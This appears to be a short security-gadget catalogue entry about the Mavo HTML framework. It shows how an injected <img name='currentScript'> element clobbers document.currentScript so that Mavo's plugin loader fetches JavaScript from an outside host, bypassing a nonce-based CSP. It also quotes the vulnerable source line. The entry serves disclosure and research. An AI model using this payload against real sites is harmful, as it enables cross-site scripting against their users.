Mavo is an HTML-based language for building small scale data-driven websites without programming knowledge (no JS, no backends needed!), just by writing HTML. For JavaScript developers (who like HTML), Mavo can also be used as a declarative, reactive front-end framework to make UI development easier.
The Mavo’s library was using document.currentScript as a reference to load plugins.
<!-- user input -->
<img name="currentScript" src="https://gmsgadget.com/assets/xss/index.js">
<script nonce="secret" src="https://get.mavo.io/stable/mavo.js"></script>
<script nonce="secret">
(function ($, $$) {
Mavo.Plugins.register("myplugin", {
dependencies: [ "index.js" ],
});
})(Bliss, Bliss.$);
</script>Root Cause
Source: https://github.com/mavoweb/mavo/blob/78efe2b9cadd09c1d131b8afd5fe2f38d5cfa8c7/src/plugins.js#L95
if (o.dependencies) {
let base = document.currentScript? document.currentScript.src : location;
let dependencies = o.dependencies.map(url => Mavo.load(url, base));
ready.push(...dependencies);
}
Related links:
Found by jackfromeast, ishmeals.